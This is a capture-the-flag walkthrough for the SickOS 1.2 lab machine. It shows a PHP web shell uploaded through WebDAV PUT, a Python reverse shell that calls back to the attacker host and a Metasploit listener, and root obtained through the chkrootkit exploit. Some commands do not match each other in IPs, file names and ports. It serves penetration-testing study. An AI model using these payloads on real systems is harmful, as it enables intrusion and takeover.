Checkout SlayerLabs.com!
Networks Engineered to Exploit.
- Windows/UNIX - Domains/Subnets - Initial/Post/Lateral - Low Cost VPN Ranges -
SickOS 1.2
First find the ip doing a quick nmap range scan
nmap -sP 192.168.56.100-120
Target is running on 192.168.56.102
Enumerate our target using nmap
nmap -v -sS -A -T5 192.168.56.102
Looks like only HTTP and SSH are open…
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 66:8c:c0:f2:85:7c:6c:c0:f6:ab:7d:48:04:81:c2:d4 (DSA)
| 2048 ba:86:f5:ee:cc:83:df:a6:3f:fd:c1:34:bb:7e:62:ab (RSA)
|_ 256 a1:6c:fa:18:da:57:1d:33:2c:52:e4:ec:97:e2:9e:af (ECDSA)
80/tcp open http lighttpd 1.4.28
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: lighttpd/1.4.28
|_http-title: Site doesn't have a title (text/html).
Opening up the target on a web browser and viewing source reveals..
<html>
<img src="blow.jpg">
</html>
<!-- NOTHING IN HERE ///\\\ -->>>>
Not much….
You can use nikto to gather more http information
nikto -h 192.168.56.102
Not much here either.
Now we’ll want to use DirBuster to gather our targets http directories.
dirb http://192.168.56.102
The only directory that comes up is /test which we go to. Not seeing any other files or directories besides /test we can use curl to further our enumeration.
curl -vX OPTIONS http://192.168.56.102/test
We now see this tidbit of information.
Allow: PROPFIND, DELETE, MKCOL, PUT, MOVE, COPY, PROPPATCH, LOCK, UNLOCK
This allows http PUT method, which will allow you to upload files into /test
We can upload a test.txt into the /test directory using curl.
curl -vX PUT -d "Greetings Earthling" http://172.16.16.141/test/test.txt
VirtualBox issues
This is where I ran into some issues. I was getting 403 errors when trying to upload various files (php, txt, jpg, etc). I remember skimming the SickOS documentation on vulnhub and recall reading that there may be issues when running on VirtualBox.
After rebooting the target a few times, upon boot I noticed an error regarding no hdd space available - which would cause the 403 error. I converted the VMDK to VDI using the VBoxMange tool through cmd.
You’ll open cmd and get to your VirtualBox directory, then run VBoxManage and convert.
c:\Program Files\Oracle\VirtualBox>
VBoxManage clonehd --format VDI "c:\path to original sickos\sickos.vmdk" "c:\new path\sickos.vdi"
Once it’s been cloned as VDI, create a New virtual machine then browse and select to your new .vdi - Boot it up and scan nmap ip ranges to check if the ip has been changed.
Try uploading again and you’ll see we’re back in business.
After testing a bit we find out the target accepts multiple files, including PHP. Knowing this, we can upload a PHP web shell with curl.
curl -X PUT -d '<?php system($_GET["cmd"]);' http://192.168.56.102/test/shell.php
Looks like the php file has been written. We can do a quick test by passing some shell commands as encoded url syntax.
curl "http://192.168.56.102/test/shell.php?cmd=ls%20-la"
Getting shell
Now the idea is to get our target machine to throw us (attacker machine) a reverse shell.
On our Attacker machine we’ll listen on port 443 through a reverse handler on Metaspolit. Then pass a python reverse shell through our /test/shell.php using encoded url syntax.
Metasploit listener
msf > use exploit/multi/handler
msf exploit(handler) > set lhost 192.168.56.104
lhost => 192.168.56.104
msf exploit(handler) > set lport 443
lport => 443
msf exploit(handler) > set payload linux/x86/shell_reverse_tcp
payload => linux/x86/shell_reverse_tcp
msf exploit(handler) > run
now we’re listening for our target to throw us a reverse shell…
Python Reverse Shell
We can find the python reverse shell script on pentestmonkey.
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
Change the ip to your Attackers ip, then run the script through a url encode conversion tool.
Once encoded, run the full command..
curl "http://192.168.56.102/test/cmd.php?cmd=python%20-c%20%27import%20socket%2Csubprocess%2Cos%3Bs%3Dsocket.socket(socket.AF_INET%2Csocket.SOCK_STREAM)%3Bs.connect((%22192.168.56.104%22%2C443))%3Bos.dup2(s.fileno()%2C0)%3B%20os.dup2(s.fileno()%2C1)%3B%20os.dup2(s.fileno()%2C2)%3Bp%3Dsubprocess.call(%5B%22%2Fbin%2Fsh%22%2C%22-i%22%5D)%3B%27"
and we see msf…
msf exploit(handler) > run
[*] Started reverse TCP handler on 192.168.56.104:443
[*] Starting the payload handler...
[*] Command shell session 1 opened (192.168.56.104:443 -> 192.168.56.102:51189) at 2017-02-12 13:24:48 -0500
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data
$
Now we have shell, but not root.
Privilege Escalation
This part is probably the most time consuming. Best thing to do is just dig and enumerate as best you can. There are plenty of guides to assist in privilege escalation, and also some common exploits you can check for initially.
Eventually I found chkrootkit was being ran as a daily job. Searching the msf db I found a chkrootkit exploit that fit into the version that was running.
Check to see when it’s ran…
/var/log/syslog | grep chkrootkit
and looks like it’s ran every minute.
Now we can run the shell session in the background then search and set the chkrootkit exploit.
msf exploit(chkrootkit) > sessions
Active sessions
===============
Id Type Information Connection
-- ---- ----------- ----------
2 shell linux /bin/sh: 0: can't access tty; job control turned off $ 192.168.56.104:443 -> 192.168.56.102:51190 (192.168.56.102)
msf exploit(chkrootkit) > set lport 8080
lport => 1337
msf exploit(chkrootkit) > set session 2
session => 2
msf exploit(chkrootkit) > set lhost 192.168.56.104
lhost => 192.168.56.104
msf exploit(chkrootkit) > run
Bingo!
You should have root now…
[*] exec: whoami
root
Once you ls files in /root you’ll see the flag “7d03aaa2bf93d80040f3f22ec6ad9d5a.txt”